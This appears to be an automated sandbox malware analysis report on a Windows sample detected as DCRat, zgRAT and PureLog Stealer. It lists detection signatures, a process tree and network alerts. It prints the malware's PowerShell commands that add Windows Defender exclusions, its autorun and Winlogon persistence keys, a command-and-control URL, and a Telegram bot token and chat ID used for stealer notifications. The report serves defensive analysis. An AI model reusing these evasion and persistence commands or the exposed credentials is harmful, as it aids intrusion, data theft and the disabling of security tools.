Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VQdUvAQ4xO.exe

Overview

General Information

Sample name:VQdUvAQ4xO.exe
renamed because original name is a hash value
Original sample name:c8ce6fc2028745f5eaf01a412d06acaa.exe
Analysis ID:1596749
MD5:c8ce6fc2028745f5eaf01a412d06acaa
SHA1:4be17e69614ea35c4cd9939f84034e0e1e43a9a0
SHA256:bd068366ec33c420f480a1085cf661ae74ab13ac83bda6ccc9997d5495bed125
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, ReverseShell, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected ReverseShell
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • VQdUvAQ4xO.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\VQdUvAQ4xO.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
    • csc.exe (PID: 1720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 1136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A2D.tmp" "c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 2488 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4940 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8168 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7296 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7332 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7832 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7916 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • r6Lr6XbTWt.exe (PID: 7548 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • tNOtXAG6xwxcUNu9tjBa.exe (PID: 8012 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
    • cmd.exe (PID: 2648 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tNOtXAG6xwxcUNu9tjBa.exe (PID: 8084 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • svchost.exe (PID: 1804 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • r6Lr6XbTWt.exe (PID: 6372 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • 0eDO5Zbs.exe (PID: 5728 cmdline: "C:\Recovery\0eDO5Zbs.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • mENvqiIeFx.exe (PID: 3520 cmdline: "C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • JOajDppbSkfqSPK1G9zAbH.exe (PID: 1184 cmdline: "C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • VQdUvAQ4xO.exe (PID: 6708 cmdline: "C:\Users\user\Desktop\VQdUvAQ4xO.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • tNOtXAG6xwxcUNu9tjBa.exe (PID: 7732 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • r6Lr6XbTWt.exe (PID: 5212 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • 0eDO5Zbs.exe (PID: 5468 cmdline: "C:\Recovery\0eDO5Zbs.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • mENvqiIeFx.exe (PID: 736 cmdline: "C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • JOajDppbSkfqSPK1G9zAbH.exe (PID: 4320 cmdline: "C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • VQdUvAQ4xO.exe (PID: 8044 cmdline: "C:\Users\user\Desktop\VQdUvAQ4xO.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • tNOtXAG6xwxcUNu9tjBa.exe (PID: 7936 cmdline: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • r6Lr6XbTWt.exe (PID: 3864 cmdline: "C:\Windows\System32\r6Lr6XbTWt.exe" MD5: C8CE6FC2028745F5EAF01A412D06ACAA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
VQdUvAQ4xO.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    VQdUvAQ4xO.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Windows\System32\r6Lr6XbTWt.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\System32\r6Lr6XbTWt.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1772742377.00000000005D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: VQdUvAQ4xO.exe PID: 1216JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: csc.exe PID: 1720JoeSecurity_ReverseShellYara detected ReverseShellJoe Security
                        Process Memory Space: r6Lr6XbTWt.exe PID: 7548JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.VQdUvAQ4xO.exe.5d0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.VQdUvAQ4xO.exe.5d0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 1720, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', ProcessId: 2488, ProcessName: powershell.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tNOtXAG6xwxcUNu9tjBa
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", ProcessId: 1720, ProcessName: csc.exe
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', ProcessId: 2488, ProcessName: powershell.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ProcessId: 1216, TargetFilename: C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe', ProcessId: 2488, ProcessName: powershell.exe
                              Sigma detected: Windows Processes Suspicious Parent Directory
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1804, ProcessName: svchost.exe

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\VQdUvAQ4xO.exe", ParentImage: C:\Users\user\Desktop\VQdUvAQ4xO.exe, ParentProcessId: 1216, ParentProcessName: VQdUvAQ4xO.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline", ProcessId: 1720, ProcessName: csc.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-22T13:22:29.114449+010020480951A Network Trojan was detected192.168.2.449739104.21.95.9380TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-22T13:22:13.998572+010028033053Unknown Traffic192.168.2.44973234.117.59.81443TCP
                              2025-01-22T13:22:34.389157+010028033053Unknown Traffic192.168.2.44974934.117.59.81443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-22T13:22:15.218847+010018100091Potentially Bad Traffic192.168.2.449733149.154.167.220443TCP
                              2025-01-22T13:22:35.477191+010018100091Potentially Bad Traffic192.168.2.449751149.154.167.220443TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: VQdUvAQ4xO.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://525833cm.nyashnyash.ru/providerServerprotectTrafficDlePublic.phpAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\cJIROItyvb.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Recovery\0eDO5Zbs.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeReversingLabs: Detection: 73%
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeReversingLabs: Detection: 73%
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeReversingLabs: Detection: 73%
                              Source: C:\Recovery\0eDO5Zbs.exeReversingLabs: Detection: 73%
                              Source: C:\Users\user\Desktop\NClzZRhR.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\NnjhOJZu.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\QCzpQABH.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\WWtOxrLm.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\XOSeUCEW.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\dGvExiJK.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\hJPUkngW.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\nluLvNRG.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\oGDUNCaL.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\oiVTRNgB.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\vSXJQEeZ.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\wMeJBGvi.logReversingLabs: Detection: 70%
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeReversingLabs: Detection: 73%
                              Multi AV Scanner detection for submitted file
                              Source: VQdUvAQ4xO.exeVirustotal: Detection: 68%Perma Link
                              Source: VQdUvAQ4xO.exeReversingLabs: Detection: 73%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeJoe Sandbox ML: detected
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\CEHidmAX.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\LuUydMov.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeJoe Sandbox ML: detected
                              Source: C:\Recovery\0eDO5Zbs.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: VQdUvAQ4xO.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"TelegramNotifer":{"chatid":"6401160547","bottoken":"7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}
                              Source: 00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-4J6ByaDz5UAU0y0XiBQ1","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                              Source: VQdUvAQ4xO.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Windows Sidebar\5a424686c5d9eaJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Windows Portable Devices\7252974aa180daJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Microsoft\b730a2198d720aJump to behavior
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49746 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                              Source: VQdUvAQ4xO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
